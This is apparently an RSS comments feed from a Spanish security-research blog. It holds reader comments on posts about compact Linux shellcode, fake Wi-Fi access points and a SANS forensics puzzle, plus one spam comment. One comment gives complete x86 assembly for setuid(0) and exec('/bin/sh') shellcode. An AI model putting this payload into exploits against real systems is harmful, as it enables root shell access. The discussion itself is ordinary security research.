Comments for OpenSec http://opensec.es Development & Security Research Mon, 08 Mar 2010 00:23:01 +0000 http://wordpress.org/?v=2.9.2 hourly 1 Comment on Smallest GNU/Linux x86 setuid(0) & exec(“/bin/sh”,0,0) Stable shellcode – 28 bytes by Tom Madsen http://opensec.es/2008/11/26/gnulinux-setuid0-execbinsh00-stable/comment-page-1/#comment-10078 Tom Madsen Mon, 08 Mar 2010 00:23:01 +0000 http://opensec.es/?p=134#comment-10078 Wouldn't: bits 32 global _start section .text _start: xor ebx,ebx push byte 23 runit: pop eax cdq int 0x80 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f mov ebx,esp push byte 11 jmp short runit be one byte shorter? Wouldn’t:

bits 32
global _start
section .text
_start:
xor ebx,ebx
push byte 23
runit:
pop eax
cdq
int 0×80
xor ecx,ecx
push ecx
push 0×68732f6e
push 0×69622f2f
mov ebx,esp
push byte 11
jmp short runit

be one byte shorter?

]]> Comment on Smallest GNU/Linux x86 setuid(0) & exec(“/bin/sh”,0,0) Stable shellcode – 28 bytes by payday loans http://opensec.es/2008/11/26/gnulinux-setuid0-execbinsh00-stable/comment-page-1/#comment-9863 payday loans Sun, 14 Feb 2010 03:04:27 +0000 http://opensec.es/?p=134#comment-9863 I am very impressed with the article I have just read. I wish the writer of opensec.es can continue to provide so much worthwhile information and unforgettable experience to opensec.es readers. There is not much to state except the following universal truth: A person who says something is impossible is usually interrupted by the person doing it. I will be back. I am very impressed with the article I have just read. I wish the writer of opensec.es can continue to provide so much worthwhile information and unforgettable experience to opensec.es readers. There is not much to state except the following universal truth: A person who says something is impossible is usually interrupted by the person doing it. I will be back.

]]> Comment on Creando un punto de acceso falso (airbase-ng) by CrazyBoSS http://opensec.es/2009/03/20/creando-un-punto-de-acceso-falso-airbase-ng/comment-page-1/#comment-9467 CrazyBoSS Tue, 05 Jan 2010 01:43:51 +0000 http://opensec.es/?p=184#comment-9467 Wenas, ie tio no logro que me de acceso a internet!! Supongo que será por los iptebles no?? Bueno tú en que OS lo has hecho? Yo en Ubuntu 9.4 con el driver r8187... Cuando lanzo airbase-ng me da un error de que no puede cambiar MTU, podría ser por eso que el forwarding no funcione, ya que tiene que redireccionar de Ethernet a Wireless, no debería pero nose... Otra obsercación es que cuando capturo los paquetes con Wireshark y me conecto en el SoftAP pues está capturando ARP preguntando todo el rato por el gw (10.0.0.1) Bueno, por último, que regla de iptable debaría poner para que me redireccione el trafico de un servidor local (uno de streaming con el vlc) a una ip:puero para que pueda ver el vídeo en otro pc? Wenas, ie tio no logro que me de acceso a internet!!

Supongo que será por los iptebles no??

Bueno tú en que OS lo has hecho? Yo en Ubuntu 9.4 con el driver r8187…

Cuando lanzo airbase-ng me da un error de que no puede cambiar MTU, podría ser por eso que el forwarding no funcione, ya que tiene que redireccionar de Ethernet a Wireless, no debería pero nose…

Otra obsercación es que cuando capturo los paquetes con Wireshark y me conecto en el SoftAP pues está capturando ARP preguntando todo el rato por el gw (10.0.0.1)

Bueno, por último, que regla de iptable debaría poner para que me redireccione el trafico de un servidor local (uno de streaming con el vlc) a una ip:puero para que pueda ver el vídeo en otro pc?

]]> Comment on Solución al reto forense del SANS Institute – Puzzle #2 by Leonardo http://opensec.es/2009/12/11/solucion-al-reto-forense-del-sans-institute-puzzle-2/comment-page-1/#comment-9297 Leonardo Fri, 18 Dec 2009 01:35:05 +0000 http://opensec.es/?p=306#comment-9297 Excelente post! Excelente post!

]]> Comment on Solución al reto forense del SANS Institute – Puzzle #2 by Alberto http://opensec.es/2009/12/11/solucion-al-reto-forense-del-sans-institute-puzzle-2/comment-page-1/#comment-9266 Alberto Tue, 15 Dec 2009 16:36:24 +0000 http://opensec.es/?p=306#comment-9266 ¡Aplausos! Qué bien explicado, Chema. Gracias por compartirlo. ¡Aplausos! Qué bien explicado, Chema. Gracias por compartirlo.

]]>